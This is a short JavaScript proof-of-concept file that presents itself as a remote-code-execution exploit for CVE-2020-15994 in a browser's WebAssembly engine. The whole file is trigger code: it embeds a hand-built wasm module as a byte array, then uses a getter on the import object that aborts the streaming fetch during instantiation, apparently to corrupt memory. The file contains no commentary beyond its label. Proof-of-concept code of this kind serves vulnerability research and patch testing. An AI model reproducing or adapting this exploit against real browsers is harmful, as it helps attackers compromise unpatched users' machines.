rce-poc.js

     
/* 

Here is the RCE PoC(CVE-2020-15994)

*/

      function typedArrayToURL(typedArray, mimeType) {
        return URL.createObjectURL(new Blob([typedArray.buffer], { type: mimeType }));
      }
      wasmCode_Info = new Uint8Array([
        0x00, 0x61, 0x73, 0x6D, 0x01, 0x00, 0x00, 0x00, 0x01, 0x0E, 0x03, 0x60, 0x01, 0x7F, 0x00, 0x60,
        0x00, 0x00, 0x60, 0x03, 0x7F, 0x7F, 0x7F, 0x00, 0x02, 0x25, 0x02, 0x04, 0x65, 0x6E, 0x76, 0x31,
        0x0B, 0x4A, 0x73, 0x46, 0x75, 0x6E, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x00, 0x00, 0x03, 0x65,
        0x6E, 0x76, 0x0A, 0x4A, 0x73, 0x46, 0x75, 0x6E, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x00, 0x00, 0x03,
        0x03, 0x02, 0x01, 0x02, 0x05, 0x06, 0x01, 0x01, 0x80, 0x02, 0x80, 0x02, 0x07, 0x22, 0x03, 0x06,
        0x6D, 0x65, 0x6D, 0x6F, 0x72, 0x79, 0x02, 0x00, 0x0C, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x52,
        0x65, 0x63, 0x6F, 0x72, 0x64, 0x00, 0x03, 0x06, 0x5F, 0x73, 0x74, 0x61, 0x72, 0x74, 0x00, 0x02,
        0x0A, 0x10, 0x02, 0x03, 0x00, 0x01, 0x0B, 0x0A, 0x00, 0x41, 0x00, 0x10, 0x01, 0x41, 0x00, 0x10,
        0x00, 0x0B, 0x0B, 0x0A, 0x01, 0x00, 0x41, 0x80, 0x0C, 0x0B, 0x03, 0xA0, 0x06, 0x50
      ]);
      var controller = new AbortController();
      var signal = controller.signal;
      alert("Exploit!");
      var importObject = {
        env: { JsFunction: num => { console.log(num) },},
        env1: { JsFunction1: num => { console.log(num) },}
      }
      importObject.__defineGetter__('env', function () {
        console.log("Callback function");
        controller.abort();                                 
        return { JsFunction: num => { console.log(num) } };
      });
      WebAssembly.instantiateStreaming(fetch(typedArrayToURL(wasmCode_Info, 'application/wasm'), { signal }), importObject)
        .then(function (obj) {
        });